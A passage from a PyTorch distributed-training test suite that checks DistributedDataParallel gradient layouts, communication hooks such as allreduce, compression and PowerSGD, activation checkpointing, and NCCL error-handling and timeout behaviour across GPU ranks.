old_DEFAULT_FIRST_BUCKET_BYTES = dist._DEFAULT_FIRST_BUCKET_BYTES
dist._DEFAULT_FIRST_BUCKET_BYTES = int(ddp_bucket_mb * 1.0e6)
try:
yield
finally:
dist._DEFAULT_FIRST_BUCKET_BYTES = old_DEFAULT_FIRST_BUCKET_BYTES
with torch.backends.cudnn.flags(
enabled=True, deterministic=True, benchmark=False
):
for formats, dtypes, bucketsize in product(
layer_formats, layer_dtypes, bucketsizes
):
with first_bucket_size(bucketsize):
model_msg = (
"rank = {} formats = {} dtypes = {} bucketsize = {} ".format(
self.rank, formats, dtypes, bucketsize
)
)
try:
m = ConvNet(layer_devs, formats, dtypes)
m_ddp = DistributedDataParallel(
copy.deepcopy(m),
device_ids=replica_devices,
process_group=process_group,
bucket_cap_mb=bucketsize,
)
opt = torch.optim.SGD(m.parameters(), lr=0.1)
opt_ddp = torch.optim.SGD(m_ddp.parameters(), lr=0.1)
has_half = any(p.dtype is torch.half for p in m.parameters())
tol = 1.0e-3 if has_half else 1.0e-5
except BaseException:
# Prints case-specific debugging info to narrow down failing case.
print(
"Caught exception during model creation for " + model_msg,
flush=True,
)
raise
# 3 iters: First iter creates grads, second iter retests after rebucketing,
# third iter tries zeroed grads.
for it in range(3):
iter_msg = "iter = {} ".format(it) + model_msg
named_msg = iter_msg
try:
F.mse_loss(m(input).float(), target).backward()
F.mse_loss(
m_ddp(input[local_batch_start:local_batch_end]).float(),
target[local_batch_start:local_batch_end],
).backward()
for i, ((layer_name, m_child), m_ddp_child) in enumerate(
zip(m.named_children(), m_ddp.module.children())
):
named_msg = layer_name + ".weight" + " " + iter_msg
self.assertTrue(
m_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
self.assertTrue(
m_ddp_child.weight.grad.is_contiguous(
memory_format=formats[i]
),
named_msg,
)
for j, ((param_name, p), p_ddp) in enumerate(
zip(
m_child.named_parameters(),
m_ddp_child.parameters(),
)
):
named_msg = (
layer_name + "." + param_name + " " + iter_msg
)
self.assertEqual(
p.grad, p_ddp.grad, rtol=tol, atol=tol
)
opt.step()
opt_ddp.step()
if it == 0:
for p, p_ddp in zip(m.parameters(), m_ddp.parameters()):
p.grad = None
p_ddp.grad = None
else:
m.zero_grad()
m_ddp.zero_grad()
except BaseException:
# Makes sure we still get info if an error occurred somewhere other than the asserts.
print(
"Caught exception during iterations at " + named_msg,
flush=True,
)
raise
@requires_nccl()
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_grad_layout_1devicemodule_1replicaperprocess(self):
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
# Tells DDP to use just one device.
replica_devices = [dev0]
# Tells _test_grad_layout to construct ConvNet with all layers on this process's first assigned device.
layer_devs = dev0
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(4)
@skip_if_rocm
def test_grad_layout_2devicemodule(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
dev0 = torch.device("cuda:" + str(int_devices[0]))
dev1 = torch.device("cuda:" + str(int_devices[1]))
# DDP's default behavior for a multi-device module is "don't replicate."
replica_devices = None
# Tells _test_grad_layout to construct this process's ConvNet on 2 devices, with 2 layers on each device.
layer_devs = [dev0] * 2 + [dev1] * 2
local_batch_size = 8
self._test_grad_layout(replica_devices, layer_devs, local_batch_size)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_param_layout_mismatch_error(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
dev0 = torch.device("cuda:" + str(gpus_for_rank(self.world_size)[self.rank][0]))
layer_devs = dev0
layer_formats = (
[torch.contiguous_format] * 4
if self.rank == 0
else [torch.channels_last] * 4
)
layer_dtypes = [torch.float] * 4
m = ConvNet(layer_devs, layer_formats, layer_dtypes)
if self.rank == 0:
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
else:
with self.assertRaisesRegex(
RuntimeError,
".* appears not to match strides of the same param in process 0",
):
m_ddp = DistributedDataParallel(
m, device_ids=[dev0], process_group=process_group
)
def _gpu_model_with_ddp_comm_hook(
self,
process_group,
hook=None,
gradient_as_bucket_view=False,
state=None,
static_graph=False,
):
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
ModuleForDdpCommHook().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
if static_graph:
gpu_model._set_static_graph()
# Register a DDP communication hook if any.
if hook is not None:
gpu_model.register_comm_hook(state, hook)
return gpu_model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_future_passing_gpu_nccl(self):
"""
This unit test verifies whether the Future object is passed properly using nccl backend.
The hook callback function creates a Future object and sets a value to it.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with simple_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(process_group, self._simple_hook)
# check whether the grads are equal to what simple_hook's then callback returns.
# without the comm_hook, result would be 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 2 * torch.ones(2, 2))
def _test_ddp_comm_hook_allreduce_hook_nccl(
self, gradient_as_bucket_view=False, static_graph=False
):
"""
This unit test verifies whether a DDP communication hook that just calls
allreduce gives the same result with the case of no hook registered.
Without the then callback, the future_value in reducer is no longer
a PyObject, and this unit test verifies future_value is properly checked.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
return (
process_group.allreduce(tensors)
.get_future()
.then(lambda fut: fut.value()[0])
)
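# The hook pre-divides the bucket by world_size (so the allreduced result is
# already averaged, matching DDP's default behavior) and uses .then() to unwrap
# the single tensor from the future's value list.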
# Get GPU model with allreduce_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_hook, gradient_as_bucket_view, static_graph
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_default_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether default Python DDP communication hooks ALLREDUCE, FP16_COMPRESS
and BF16_COMPRESS, can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# For these default DDP comm hooks, the only state is process group.
state = process_group
hook_options = [default.allreduce_hook, default.fp16_compress_hook]
if (
not TEST_WITH_ROCM
and BFLOAT16_AVAILABLE
and c10d.is_nccl_available()
and torch.cuda.nccl.version() >= (2, 9, 7)
):
hook_options.append(default.bf16_compress_hook)
for hook in hook_options:
# Get GPU model with the hook registered.
# The first arg 'process_group' is used for initializing the test environment,
# so it cannot be replaced by 'state', although they have the same value.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_fp16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the FP16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.fp16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_bf16_compress_wrapper(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether wrapping the ALLREDUCE and POWER_SGD hooks with
the BF16_WRAPPER can give the same result as when there is no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
powerSGD_state = powerSGD.PowerSGDState(process_group=process_group)
hook_args = [
(powerSGD.powerSGD_hook, powerSGD_state),
(default.allreduce_hook, process_group),
]
for hook, state in hook_args:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default.bf16_compress_wrapper(hook),
gradient_as_bucket_view,
state,
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_hook_then_optimizer(
self,
functional_optim_cls,
*functional_optim_args,
gradient_as_bucket_view=False,
**functional_optim_kwargs
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
hook, hook_state = default.allreduce_hook, process_group
opt_hook_state = default._OptimizerHookState(
functional_optim_cls,
*functional_optim_args,
**functional_optim_kwargs,
)
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group,
default._hook_then_optimizer(hook, opt_hook_state),
gradient_as_bucket_view,
hook_state,
)
prev_params = copy.deepcopy(list(gpu_model.parameters()))
# Run model with optimizer as part of hook
for _ in range(8):
gpu_model.zero_grad()
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
new_params = list(gpu_model.parameters())
# Run plain model with allreduce hook and separate optimizer step.
# Verify gradients are the same.
gpu_model_allreduce = self._gpu_model_with_ddp_comm_hook(
process_group, default.allreduce_hook, gradient_as_bucket_view, hook_state
)
mapping = {v: k for k, v in functional_optim_map.items()}
sgd = mapping.get(functional_optim_cls)(
gpu_model_allreduce.parameters(),
*functional_optim_args,
**functional_optim_kwargs,
)
for _ in range(8):
gpu_model_allreduce.zero_grad()
self._run_and_verify_hook(gpu_model_allreduce, 8, 0.25 * torch.ones(2, 2))
sgd.step()
post_opt_params = list(gpu_model_allreduce.parameters())
for opt_as_hook_param, post_opt_param in zip(new_params, post_opt_params):
self.assertEqual(opt_as_hook_param, post_opt_param)
def _test_powerSGD_ddp_comm_hook_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether Python DDP communication hook POWER_SGD
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
# Get GPU model with the hook registered.
# Test the hook with different algorithmic configs.
for use_error_feedback, warm_start in product([True, False], [True, False]):
state = powerSGD.PowerSGDState(
process_group=process_group,
matrix_approximation_rank=1,
use_error_feedback=use_error_feedback,
warm_start=warm_start,
)
for hook in [powerSGD.powerSGD_hook, powerSGD.batched_powerSGD_hook]:
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, hook, gradient_as_bucket_view, state
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
def _test_builtin_ddp_comm_hooks_nccl(self, gradient_as_bucket_view=False):
"""
This unit test verifies whether built-in C++ DDP communication hooks ALLREDUCE and FP16_COMPRESS
can give the same result with the case of no hook registered.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for comm_hook_type in [
dist.BuiltinCommHookType.ALLREDUCE,
dist.BuiltinCommHookType.FP16_COMPRESS,
]:
# Get GPU model with the built-in communication hook.
gpu_model = self._gpu_model_with_builtin_ddp_comm_hook(
process_group, comm_hook_type, gradient_as_bucket_view
)
# check whether the grads are equal to what DDP without hook would return.
self._run_and_verify_hook(gpu_model, 8, 0.25 * torch.ones(2, 2))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl(self):
self._test_ddp_comm_hook_allreduce_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl(self):
self._test_default_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_nccl(self):
self._test_fp16_compress_wrapper()
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_nccl(self):
self._test_bf16_compress_wrapper()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_sgd_nccl_grad_as_bucket_view(self):
sgd_lr = 1e-2
sgd_momentum = 0.9
sgd_weight_decay = 0.01
self._test_hook_then_optimizer(
_FunctionalSGD,
sgd_lr,
momentum=sgd_momentum,
weight_decay=sgd_weight_decay,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adamw_nccl(self):
adamw_lr = 1e-2
adamw_betas = (0.9, 0.99)
adamw_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdamW,
adamw_lr,
betas=adamw_betas,
eps=adamw_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_hook_then_adam_nccl_grad_as_bucket_view(self):
adam_lr = 1e-2
adam_betas = (0.9, 0.99)
adam_eps = 1e-6
self._test_hook_then_optimizer(
_FunctionalAdam,
adam_lr,
betas=adam_betas,
eps=adam_eps,
gradient_as_bucket_view=True
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl(self):
self._test_builtin_ddp_comm_hooks_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl(self):
self._test_powerSGD_ddp_comm_hook_nccl()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_grad_is_view(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_hook_nccl_static_graph(self):
self._test_ddp_comm_hook_allreduce_hook_nccl(static_graph=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_default_ddp_comm_hooks_nccl_is_view(self):
self._test_default_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_compress_wrapper_is_view(self):
self._test_fp16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@requires_nccl_version((2, 9, 7), "Need NCCL 2.9.7+ for BF16_COMPRESS")
@sandcastle_skip_if(
not BFLOAT16_AVAILABLE,
"BFloat16 is only supported by CUDA 11+",
)
@skip_if_lt_x_gpu(2)
@skip_if_rocm
def test_bf16_compress_wrapper_is_view(self):
self._test_bf16_compress_wrapper(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_builtin_ddp_comm_hooks_nccl_grad_is_view(self):
self._test_builtin_ddp_comm_hooks_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_powerSGD_ddp_comm_hook_nccl_grad_is_view(self):
self._test_powerSGD_ddp_comm_hook_nccl(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_comm_hook_allreduce_with_then_hook_nccl(self):
"""
This unit test verifies whether a DDP communication hook that calls allreduce and then
multiplies the result by ten and divides by two gives the expected result.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce_with_then_hook(
state: object, bucket: dist.GradBucket
) -> torch.futures.Future[torch.Tensor]:
tensors = [bucket.buffer() / self.world_size]
fut = process_group.allreduce(tensors).get_future()
def mult(fut):
# Multiply the result by 10.
return 10 * fut.value()[0]
def div(fut):
# Divide the result by 2.
return 0.5 * fut.value()
return fut.then(mult).then(div)
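# Net effect: the averaged allreduce result is scaled by 10 * 0.5 = 5, so the
# expected gradient below is 5 * 0.25 = 1.25 times torch.ones(2, 2).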
# Get GPU model with allreduce_with_then_hook registered.
gpu_model = self._gpu_model_with_ddp_comm_hook(
process_group, allreduce_with_then_hook
)
# check whether the grads are equal to what allreduce returns multiplied by 5.
# without the comm_hook, result would be still 0.25 * torch.ones(2, 2).
self._run_and_verify_hook(gpu_model, 8, 1.25 * torch.ones(2, 2))
class AcceptsParam(torch.nn.Module):
def __init__(self, p, factor):
super().__init__()
self.a = p
self.f = factor
def forward(self, input):
return input + self.a * self.f
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
size = 2048 * 2048
dev = self.rank
world = self.world_size
p = torch.nn.Parameter(torch.randn(size, requires_grad=True))
for try_set_to_none, use_bucket_view in product((False, True), (False, True)):
m = torch.nn.Sequential(
self.AcceptsParam(p, dev + 1), self.AcceptsParam(p, dev + 1)
).cuda(dev)
m = torch.nn.parallel.DistributedDataParallel(
m,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[dev],
process_group=process_group,
)
for i in range(3):
m.zero_grad(set_to_none=try_set_to_none)
m(1).sum().backward()
# Each param value is multiplied by "rank + 1" twice in forward, so the grad
# values produced by a particular rank should be 2. * (rank + 1).
# Summing these over ranks and dividing by world size gives the expected result:
analytic = torch.full_like(
p, 2.0 * (world * (world + 1.0) / 2.0) / world, device=dev
)
for name, p in m.named_parameters():
self.assertEqual(
p.grad,
analytic,
"mismatch at "
+ name
+ ".grad for "
+ "set_to_none = {}, use_bucket_view = {}".format(
try_set_to_none, use_bucket_view
),
)
# A list of tests for ddp with activation checkpointing
# when gradient_as_bucket_view=True, False.
# Most of the tests are adapted from
# https://github.com/facebookresearch/fairscale/blob/master/tests/nn/pipe/test_checkpoint_ddp.py
class CheckpointOnceModule(nn.Module):
def __init__(self):
super().__init__()
self.l1 = nn.Linear(20, 20)
self.l2 = nn.Linear(20, 20)
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
return x
class CheckpointTwiceModule(CheckpointOnceModule):
def __init__(self):
super().__init__()
def forward(self, inp):
x = self.l1(inp)
x = checkpoint(self.l2, x)
x = checkpoint(self.l2, x)
return x
def _prepare_dummy_data(self):
ddp_bs = 16
bs = ddp_bs * self.world_size
input = torch.rand((bs, 20), device="cuda", requires_grad=True)
target = torch.randn((bs, 20), device="cuda")
offset = self.rank * ddp_bs
ddp_input = input[offset : offset + ddp_bs]
ddp_target = target[offset : offset + ddp_bs]
return input, ddp_input, target, ddp_target
def _train_model(self, model, input_var, target, loss, run_checkpoint=False):
model.train()
if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# to reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expected when a layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkpointed twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
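# Illustrative sketch (an assumption, mirroring the passing cases above): outside
# the test harness, checkpointing the same layer twice or combining checkpointing
# with find_unused_parameters requires static-graph mode, e.g.
#   ddp = nn.parallel.DistributedDataParallel(model, device_ids=[rank])
#   ddp._set_static_graph()  # avoids the "mark a variable ready only once" error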
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block Python thread as allreduce enqueues
# the cuda operation, and then wait only blocks the current cuda
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure cuda has not gotten stuck.
# It was observed cuda could get stuck if NCCL communicators were
# not properly aborted before throwing RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (e.g. files for FileStore) before going down.
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
